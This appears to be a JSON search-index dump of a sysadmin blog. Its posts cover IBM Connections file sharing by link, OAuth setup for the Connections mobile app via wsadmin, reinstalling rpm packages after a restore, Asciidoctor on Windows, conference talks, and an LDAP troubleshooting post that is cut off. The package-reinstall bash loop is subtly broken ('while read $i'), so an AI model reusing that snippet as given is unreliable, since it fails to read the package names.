la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/Froscon14-DocumentationWithAnyEditor.html\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://media.ccc.de/v/froscon2019-2389-documentation_with_any_editor\" target=\"_blank\"\u003eDocumentation with any editor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \n \u003ci class=\"las la-video la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"social-connections-15\"\u003eSocial Connections 15 \u003ca href=\"#social-connections-15\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/SocCnx15-HowBeingAConnectionsAdministratorGaveMeGrayHairs.html\" target=\"_blank\"\u003eHow being a Connections administrator gave me gray hairs \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2019/","title":"Talks 2019"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/files/","title":"Files"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/sharing/","title":"Sharing"},{"body":"The last IBM Connections 6.0 CR4 introduced the new feature \u0026ldquo;Sharing Files via Link\u0026rdquo;. A quite handy way to share files with users by link. Just open the file, go to sharing and select \u0026ldquo;Share by Link\u0026rdquo;.\n\u0026ldquo;Share by Link\u0026rdquo; makes it easy to share and grant read access to personal and Community files.\nWe tested the feature and it works like a charm, but…​\n— What\u0026rsquo;s New in IBM Connections Cumulative Release 4\nEverybody who gets this link, can download the shared file (and share the link with others)\nEven in restricted communities everybody with editor access can create the link\nThe users are not added to the readers field (like mentioned here )\nYou don’t see in About \u0026gt; Views who or that anybody downloaded the file So you don’t know if, who or how many users have downloaded your shared file.\nOn the screenshot you see my testldap user, I tested with this one too, but he has the admin role of all applications, so he can see the file directly in the viewer and he appears in the Viewer list. A user with default access right does not see the Docs Viewer, they only have the option to download the file.\nIn my eyes that’s nothing I want to have active in my environments. To deactive this feature, go to Gatekeeper (you need to have the admin role in the application Common) and change FILES_ENABLE_FILE_SHARE_WITH_LINK to FALSE.\nURL to Gatekeeper: https://yourconnectionsurl.example.com/connections/config/highway.main.gatekeeper.tiles No reboot needed, after a refresh the option for sharing with link has disappeared.\nShared file links generate a \u0026ldquo;Page Not Found\u0026rdquo; error message after disabling the feature. If you reenable it, old sharing links are working again.\nChanges with Gatekeeper can be tested on the fly. So no reboots or restarts needed. Just try it.\nUpdate 06.03.2019 The original post was from 25th of february, but I need to update some things.\nToday I checked the functionality again and I think there is only a tiny bit missing to have a working solution, which hopefully can be delivered with an update.\nThere are differences in the sharing by link, when you share a personal and a community file. It is important if the file can be opened by the IBM Docs Viewer!\nSo I found several dependencies:\nA personal file shared by link which can’t be viewed in the Docs Viewer, can be downloaded by everybody who has the link and the downloading user is not visible in the \u0026ldquo;Views\u0026rdquo; Secion of the file.\nA personal file which can be opened in the Docs Viewer will create an entry in the \u0026ldquo;Views\u0026rdquo; Section!\nFor community files it is important if the file is viewable in the Docs Viewer and if the user already can access the file (public communities, or users which already are members in the community). I haven’t checked the dependencies with the Docs Viewer in that case. So users which get access to the file through the link (not member, not public shared) are not appearing in the \u0026ldquo;Views\u0026rdquo;.\nAnd a really important point: User with editor access in community can only share files by link which they uploaded to the community. Files from owners or other members can’t be shared!\nOwners are able to share any file of a community by link.\nI’m still not completely happy with the implementation, but I will activate it, when the users can see all downloads and views.\n","excerpt":"\u003cp\u003eThe last \u003ca href=\"https://www.ibm.com/support/knowledgecenter/en/SSYGQH_6.0.0/admin/overview/i_ovr_r_whats_new.html\" target=\"_blank\"\u003eIBM Connections 6.0 CR4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n introduced the new feature \u0026ldquo;Sharing Files via Link\u0026rdquo;.\nA quite handy way to share files with users by link.\nJust open the file, go to sharing and select \u0026ldquo;Share by Link\u0026rdquo;.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u0026ldquo;Share by Link\u0026rdquo; makes it easy to share and grant read access to personal and Community files.\u003c/p\u003e\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2019/20190225-fileshareing-cnx6cr4/","title":"Updated - Thoughts About Sharing Files Via Link - IBM Connections 6.0 CR4"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/mobile/","title":"Mobile"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/oauth/","title":"OAuth"},{"body":"A lot of people don’t like to store credentials in mobile apps or browsers. A good workaround is the usage of OAuth 2.0 tokens, but the application needs to support it and the server you’re talking to too. The IBM Connections Mobile App can use it for authentication.\nOAauth2 can be used directly with WebSphere Application Server and Connections 6.0. There are no special OAuth servers or applications needed!\nThe Documentation at IBM was a little bit confusing for me, there are lots of sidenotes, but you just need to do following steps, to use OAuth 2.0 token-based authentication with the IBM Connections Mobile App.\n== Register Client\nOpen wsadmin and add the client identifier for the mobile app:\ncd /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/bin ./wsadmin.sh -lang jython -username was-user -password password execfile(\u0026#39;oauthAdmin.py\u0026#39;) OAuthApplicationRegistrationService.addApplication(\u0026#34;connections_social_mobile\u0026#34;, \u0026#34;Connections Mobile\u0026#34;, \u0026#34;com.ibm.ibmscp://com.ibm.mobile.connections/token\u0026#34;) Now open connectionsProvider.xml in /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/cellName/oauth20/! Set the following value to true:\n\u0026lt;parameter name=\u0026#34;oauth20.allow.public.clients\u0026#34; type=\u0026#34;cc\u0026#34; customizable=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;value\u0026gt;true\u0026lt;/value\u0026gt; \u0026lt;/parameter\u0026gt; Default is false here! Now the OAuth Provider needs to be recreated (start command in Dmgr01/bin):\nLinux\n./wsadmin.sh -lang jython -conntype SOAP -c \u0026#34;print AdminTask.createOAuthProvider(\u0026#39;[-providerName connectionsProvider -fileName /opt/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/nameCell01/oauth20/connectionsProvider.xml]\u0026#39;)\u0026#34; -username wasadmin -password password Windows\nwsadmin.bat -lang jython -conntype SOAP -c \u0026#34;print AdminTask.createOAuthProvider(\u0026#39;[-providerName connectionsProvider -fileName d:/IBM/WebSphere/AppServer/profiles/Dmgr01/config/cells/nameCell01/oauth20/connectionsProvider.xml]\u0026#39;)\u0026#34; -username wasadmin -password password The Documentation tells you to restart all Application Servers now. I would wait until you finished the mobile-config.xml changes.\nEnable OAuth in mobile-config.xml mobile-config.xml\n... \u0026lt;!-- SECURITY SETTINGS SECTION --\u0026gt; \u0026lt;SecuritySettings enabled=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;AuthType\u0026gt;OAuth\u0026lt;/AuthType\u0026gt; ... \u0026lt;OAuthAuthorizationURL\u0026gt;https://yourcnx-webserver-name/oauth2/endpoint/connectionsProvider/authorize\u0026lt;/OAuthAuthorizationURL\u0026gt; \u0026lt;OAuthTokenURL\u0026gt;https://yourcnx-webserver-name/oauth2/endpoint/connectionsProvider/token\u0026lt;/OAuthTokenURL\u0026gt; \u0026lt;OAuthClientId\u0026gt;connections_social_mobile\u0026lt;/OAuthClientId\u0026gt; ... Change \u0026lt;AuthType/\u0026gt; to this line\nChange \u0026lt;OAuthAuthorizationURL/\u0026gt; to this line, change your CNX Hostname\nChange \u0026lt;OAuthTokenURL/\u0026gt; to this line, change your CNX Hostname\nJust as an information this name was used in the registration command in the first steps (Default)\nWhen you sync the nodes and restart your application servers, the setting is immediately activated! So users already use the Connections Mobile app (with saved credentials) are logged out and need to reauthenticate in the web form for OAuth!\nMobile Client configuration When you add your server to the mobile app, you get the login screen of your Connections environment after providing the server hostname:\nNow the user needs to Grant the Access to the system.\nI tested in a VPN environment and got messages that no profile can be found for my credentials, but reload always showed the content. I think this needs to be tested a little bit more!\n","excerpt":"\u003cp\u003eA lot of people don’t like to store credentials in mobile apps or browsers. A good workaround is the usage of OAuth 2.0 tokens, but the application needs to support it and the server you’re talking to too. The IBM Connections Mobile App can use it for authentication.\u003c/p\u003e\n\u003cp\u003eOAauth2 can be used directly with WebSphere Application Server and Connections 6.0. There are no special OAuth servers or applications needed!\u003c/p\u003e\n\u003cp\u003eThe \u003ca href=\"https://www.ibm.com/support/knowledgecenter/SS5JS8/admin/oauth2-overview.html\" target=\"_blank\"\u003eDocumentation at IBM \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n was a little bit confusing for me, there are lots of sidenotes, but you just need to do following steps, to use OAuth 2.0 token-based authentication with the IBM Connections Mobile App.\u003c/p\u003e","ref":"https://stoeps.de/posts/2019/20190122-oauth-connections-mobile/","title":"Use OAuth 2.0 token-based authentication with IBM Connections Mobile App"},{"body":"In the last days I had a problem with a crashed virtual disk on a WebSphere Application Server. The backup team was able to recover all the data, but the operating system needs to be reinstalled. The operating system was Red Hat Linux, so rpm-based. One of the first tasks after recovery was to identify and reinstall missing packages.\nA big advantage was that several WebSphere nodes were used in this environment, the Deployment Manager was still intact, and a still working server could be used as a basis for determining the missing packages.\nI used the following commands:\nOn a working node\nrpm -qa | sort \u0026gt; all-packages-node1.txt On the restored machine\nrpm -qa | sort \u0026gt; all-packages-restored.txt Now we need to compare the lists and generate a list of all missing packages:\ncomm -23 all-packages-node1.txt all-packages-restored.txt \u0026gt; missing-packages.txt So we have a list of missing packages, in this case I had to install about 200 packages. I’m a little lazy and didn’t want to enter or copy and paste all the package names. So let’s use a short bash snippet (not very elegant, but it works):\nwhile read $i; do sudo yum -y install $i done \u0026lt; missing-packages.txt The installation process takes a few minutes, but after that all missing packages should be reinstalled. If additional repositories are needed, they should be reactivated or added before the installation process. Manually installed RPM packages can be found by repeating the above procedure and checking for missing packages.\nI also used these snippets when I changed my working machine. So I created a backup list of all installed applications and reinstalled everything on the new computer.\nPoints learned\nI now regularly create the list of installed packages so that it can be stored on the backup tapes and used during recovery.\n","excerpt":"\u003cp\u003eIn the last days I had a problem with a crashed virtual disk on a WebSphere Application Server.\nThe backup team was able to recover all the data, but the operating system needs to be reinstalled.\nThe operating system was Red Hat Linux, so rpm-based.\nOne of the first tasks after recovery was to identify and reinstall missing packages.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20181211-install-all-packages-of-other-rpm-based-linux/","title":"Install All Packages After Restore on RPM-based Linux"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/rpm/","title":"RPM"},{"body":"Docker Mannheim Meetup Kubernetes 101 Social Connections 14 Kubernetes 101 Kubernetes 101 Admincamp IBM Connections Administrieren IBM Connections Administrieren IBM Connections Adminblast IBM Connections Adminblast Docker - Was ist das eigentlich? Docker - Was ist das eigentlich? During Admincamp I did a workshop about Docker too. I used a Jupyter Notebook to show all commands. As promised I uploaded all used files and the workbook in Jupyter and html format to Gitlab.\nGitlab with all files: https://gitlab.com/stoeps/ac2018-docker-handson Direct link to workbook: https://gitlab.com/stoeps/ac2018-docker-handson/blob/master/DockerHandsOn-Admincamp2018.ipynb if you open that directly at gitlab, it will render. Or you use the html copy of the document. All files which are used in the workbook (Dockerfiles, Js, html) are all available in the repository. Please download as zip, or clone it with git.\nTo do all the practical stuff, you can download a live linux e.g. at https://ubuntu.com/Download and install Docker, or you install Docker native on your Windows, Mac or Linux Host. The installation procedure is documented on https://docs.docker.com .\nFroscon13 Documentation with any editor Documentation with any editor ","excerpt":"\u003ch2 id=\"docker-mannheim-meetup\"\u003eDocker Mannheim Meetup \u003ca href=\"#docker-mannheim-meetup\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/Meetup-MA-KubernetesBasics.html\" target=\"_blank\"\u003eKubernetes 101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"social-connections-14\"\u003eSocial Connections 14 \u003ca href=\"#social-connections-14\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/SocCnx14-KubernetesBasicsForConnectionsAdmins.html\" target=\"_blank\"\u003eKubernetes 101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/SocCnx14-KubernetesBasicsForConnectionsAdmins.pdf\" target=\"_blank\"\u003eKubernetes 101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"admincamp\"\u003eAdmincamp \u003ca href=\"#admincamp\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T1S2-IBMConnectionsAdministrieren.html\" target=\"_blank\"\u003eIBM Connections Administrieren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T1S2-IBMConnectionsAdministrieren.pdf\" target=\"_blank\"\u003eIBM Connections Administrieren \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S8-IBMConnectionsAdminblast.html\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S8-IBMConnectionsAdminblast.pdf\" target=\"_blank\"\u003eIBM Connections Adminblast \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S3-DockerWasIstDasEigentlich.html\" target=\"_blank\"\u003eDocker - Was ist das eigentlich? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/AC18-T3S3-DockerWasIstDasEigentlich.pdf\" target=\"_blank\"\u003eDocker - Was ist das eigentlich? \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDuring Admincamp I did a workshop about Docker too. I used a Jupyter Notebook to show all commands. As promised I uploaded all used files and the workbook in Jupyter and html format to Gitlab.\u003c/p\u003e","ref":"https://stoeps.de/speaking/2018/","title":"Talks 2018"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/docker/","title":"Docker"},{"body":"Today I had the pleisure to give a talk about Kubernetes Basics at the Docker Mannheim Meetup . I enjoyed it very much and we had some very good discussions after the talk with the traditional pizza and drinks sponsored by Stocard .\nA big shout-out to Jens and Martina for organizing the meetup!\nimage::https://pbs.twimg.com/media/DtMIBDtX4AEcmmG.jpg[width:480px]\nDuring the talk I promised that I will upload the slides and provide some more links:\nSession slides can be found here:\nKubernetes 101 Kubernetes 101 Links Kubetail Mastering Chaos - A Netflix Guide to microservices The DevOps 2.3 Toolkit , also available on Packtpub ","excerpt":"\u003cp\u003eToday I had the pleisure to give a talk about Kubernetes Basics at the \u003ca href=\"https://www.meetup.com/Docker-Mannheim\" target=\"_blank\"\u003eDocker Mannheim Meetup \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nI enjoyed it very much and we had some very good discussions after the talk with the traditional pizza and drinks sponsored by \u003ca href=\"https://stocardapp.com/en/de/\" target=\"_blank\"\u003eStocard \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eA big shout-out to \u003ca href=\"https://twitter.com/onwerk\" target=\"_blank\"\u003eJens \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and \u003ca href=\"https://twitter.com/MartinaKraus11\" target=\"_blank\"\u003eMartina \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for organizing the meetup!\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20181129-dockermannheim/","title":"Kubernetes 101 - Docker Mannheim"},{"body":"","excerpt":"","ref":"https://stoeps.de/categories/talk/","title":"Talk"},{"body":"Last week I attended Social Connections 14 in Berlin, the event location had a great view and weather was great.\nI had the chance to do a session on \u0026ldquo;Kubernetes Basics for IBM Connections Admins\u0026rdquo;. The session slides are attached on that post and there will be a video recording available some day at https://www.panagenda.com .\nKubernetes 101 The event was well organized (as always) of the awesome team Wannes, Maria, Simon, Nico, Martin and Jan. The sessions were very interesting, I attended:\nSTEP-BY-STEP INSTALLATION OF COMPONENT PACL of Martti Garden and Roberto Boccadoro IBM released the new version of Component Pack 6.0.0.6 in the night before Social Connections, the presenters showed it already. 6.0.0.6 is the first version which is not bundled with IBM Cloud Private and can be deployed on any Kubernetes environment.\nIBM CONNECTIONS – DEEP INSIGHTS FROM RUNNING AT LARGE SCALE of Patrick Spielmann BOSCH CONNECT – UNDER THE HOOD – 2018 EDITION of Daniel Glück and Serhar Şen RUNNING MICROSERVICES IN PRODUCTION WITH IBM of Nico Meisenzahl STABILISING A LARGE IBM CONNECTIONS ENVIRONMENT of Martijn de Jong Martijn and Patrick were first timers for talks at Social Connections, and they did a real good job. Thanks guys.\nAll presentations can be found at the Social Connections slideshare .\n","excerpt":"\u003cp\u003eLast week I attended Social Connections 14 in Berlin, the event location had a great view and weather was great.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20181022-socialconnections/","title":"Social Connections 14 in Berlin"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/admincamp/","title":"Admincamp"},{"body":"This week starts with Admincamp in Gelsenkirchen. Thanks Rudi Knegt and team for this awesome event! The conference or lets name it camp was real fun. In the end I did three sessions and a workshop. You can find download links to all slides and used files in this article or on https://stoeps.de/speaking/2018/ . I learned and heared a lot of interesting stuff around IBM Notes, IBM Connections and Sametime. You can get most of the session slides through the Admincamp agenda .\nSave the date! Next https://admincamp.de will take place from 25. to 27. March 2019 here in Gelsenkirchen.\nHere can you find my session slides (all talks were held in english), but maybe you can run them through deepl or Google Translate .\nLike most of my documentation, these slidedecks are written with https://asciidoctor.org using the reveal.js backend. Main advantage is the possiblity to put the content into a version control system like git. So the slides are delivered in HTML and later converted with DeckTape to pdf.\nLink goes to the reveal.js html file. Best viewed in fullscreen of your browser (F11). Additionally I added the PDF download file.\nIBM Connections Administrieren IBM Connections Adminblast Docker - Was ist das eigentlich? During Admincamp I did a workshop about Docker too. To get all basics for this workshop, you should have a look into the Session slides of the Docker 101 session . I used a Jupyter Notebook to show all commands. If you wanna run the dynamic parts, you need to install jupyter and the bash kernel for it. But you will learn more, if you type the commands to a console instead. As promised I uploaded all used files and the workbook in Jupyter and html format to Gitlab.\nGitlab with all files: https://gitlab.com/stoeps/ac2018-docker-handson Direct link to workbook: https://gitlab.com/stoeps/ac2018-docker-handson/blob/master/DockerHandsOn-Admincamp2018.ipynb if you open that directly at gitlab, it will render. Or you use the html copy of the document.\nAll files which are used in the workbook (Dockerfiles, Js, html) are all available in the repository. Please download as zip, or clone it with git.\nTo do all the practical stuff, you can download a live linux e.g. at https://ubuntu.com/Download and install Docker, or you install Docker native on your Windows, Mac or Linux Host. The installation procedure is documented on https://docs.docker.com .\n","excerpt":"\u003cp\u003eThis week starts with \u003ca href=\"https://www.admincamp.de\" target=\"_blank\"\u003eAdmincamp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Gelsenkirchen.\nThanks Rudi Knegt and team for this awesome event!\nThe conference or lets name it camp was real fun.\nIn the end I did three sessions and a workshop.\nYou can find download links to all slides and used files in this article or on \u003ca href=\"https://stoeps.de/speaking/2018/\" target=\"_blank\"\u003ehttps://stoeps.de/speaking/2018/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\nI learned and heared a lot of interesting stuff around IBM Notes, IBM Connections and Sametime.\nYou can get most of the session slides through the \u003ca href=\"http://admincamp.de/AC18/Agenda\" target=\"_blank\"\u003eAdmincamp agenda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180917-admincamp-2018/","title":"Attending Admincamp 2018"},{"body":"During my talk at FrOSCon I wasn’t sure how to install Asciidoctor on Windows. So I tried on a Windows 10 VM.\nWhen you want to use Asciidoctor on a Windows desktop, you need to download the Rubyinstaller and install it.\nNow you can open a administrative command window and install with gem install asciidoctor.\nLet’s test with an easy document:\ntest.adoc\n= Test Asciidoctor on Windows :icons: font == Admonition NOTE: Will this work? TIP: Convert with `asciidoctor test.adoc` Update I had a typo in the conversion command, you can still see it in the screenshot. Sorry about that. You need to convert the source with asciidoctor test.adoc not .html!\nTo get the easy install into the documentation, I created a pull request at Github .\n","excerpt":"\u003cp\u003eDuring my talk at \u003ca href=\"https://www.froscon.de\" target=\"_blank\"\u003eFrOSCon \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n I wasn’t sure how to install Asciidoctor on Windows. So I tried on a Windows 10 VM.\u003c/p\u003e\n\u003cp\u003eWhen you want to use \u003ca href=\"https://asciidoctor.org\" target=\"_blank\"\u003eAsciidoctor \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on a Windows desktop, you need to download the \u003ca href=\"https://rubyinstaller.org/downloads/\" target=\"_blank\"\u003eRubyinstaller \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and install it.\u003c/p\u003e\n\u003cp\u003eNow you can open a administrative command window and install with \u003ccode\u003egem install asciidoctor\u003c/code\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180825-asciidoctor-windows/","title":"Asciidoctor Windows"},{"body":"Today I attended Froscon 13 in St. Augustin. Froscon is one or the biggest event around Opensource in Germany. Thanks again to organizers sponsors of this awesome event, it was a pleisure to be here and have the chance to give a talk.\nThe slides for my session \u0026ldquo;Documentation with any editor\u0026rdquo; can be found at https://gitlab.com/stoeps/froscon18-presentation/blob/master/froscon13-documentationwithanyeditor.pdf .\nIf you’re interested and missed the talk, there is a video recording at https://media.ccc.de available.\nDocumentation with any editor Example files linked from session slides are stored in this Gitlab Repostitory https://gitlab.com/stoeps/asciidoctor-documentation-example , here you find the used build.gradle, Makefile and CI/CD configuration I normally use.\n","excerpt":"\u003cp\u003eToday I attended \u003ca href=\"https://froscon.de\" target=\"_blank\"\u003eFroscon 13 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in St. Augustin.\nFroscon is one or the biggest event around Opensource in Germany.\nThanks again to organizers sponsors of this awesome event, it was a pleisure to be here and have the chance to give a talk.\u003c/p\u003e\n\u003cp\u003eThe slides for my session \u0026ldquo;Documentation with any editor\u0026rdquo; can be found at \u003ca href=\"https://gitlab.com/stoeps/froscon18-presentation/blob/master/froscon13-documentationwithanyeditor.pdf\" target=\"_blank\"\u003ehttps://gitlab.com/stoeps/froscon18-presentation/blob/master/froscon13-documentationwithanyeditor.pdf \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2018/20180825-froscon13/","title":"Froscon13"},{"body":"Today I learned a new lesson during troubleshooting a IBM Connections System. I updated to 6.0 CR2, updated WebSphere to FP13, last fixpack for Docs and so on. You will ask if I added IFP88438 to the list, be sure that I installed this fix which reanables the root element in Federated Repositories. Have a look at WAS 8.5.5 FP12 breaks Domino \u0026ldquo;root\u0026rdquo; base entry setting for more details.\nThen one of the two deployments showed strange behavior with Activities. On the Activitystream I only got an orange error symbol instead of the Todo list and when I opened Activities directly I got an empty page.\nThe error log just said CLFRA0123E: Profile Provider Error and\nEJPVJ9367E: Unable to associate the login ID cnxadmin to the user ID 0C000000-EC0B-0E00-ADMI-N,OU=SVC,O=EXAMPLE,C=DE com.ibm.lconn.wikis.web.servlet.Application doGet The current user is not valid. All other applications worked, they showed similar errors in the log, but everything worked. TDI Synchronisation worked perfectly. I checked the databases and found that new admin profiles got created with this DN/UUID syntax. Normally I would expect a UUID here.\nA third system worked in that environment, but with different LDAP servers. All other applications (Sametime, Printer, Quickr) which used that server worked perfectly.\nSeveral restarts later, I checked everything.\nRollback Fixpack Install on WebSphere\nEnabled and disabled the administrator user.\nRedeployed Activities and so on.\nNothing helped!\nI could logon and only Activities had issues, so I decided to go back to a snapshot with CR1.\nWhat shall I say? Same error appeared…​\nSo I started a LDAP Browser and tried a search on the directory server (Domino LDAP System).\nOk, so the LDAP server has a problem, when I tried the directory search. Sorry about the german error message, it says:\nDirectory Search - [servername:port]\nAn error occurred when the schema was received. The schema entry from …​ does not seem to be valid, since the required attributes attributeType and objectClass with non-empty value sets do not exist. Try changing your credentials or the list of server-side access controls (ACL).\nA short view on the Domino LDAP server showed that the database index for names.nsf was missing, but that couldn’t be the root cause, because the LDAP server was used several months for authenticating WebSphere, Connections and Sametime.\nA short restart later and a new try …​ After the restart the ldap browser was able to search and gets results. Restarting Connections server and Activities showed up.\nWhat have I learned? A lot …​\nFirst of all it was a little surprise that the different applications of Connections do direct LDAP calls. I knew that Blogs do this, because the blogs ldap table never used the peopledb content, it collects the user informations directly. The Activities lookups seems very long, because in my experience only longer queries have problems with missing indexes on directory databases. Failover LDAP servers are useful for 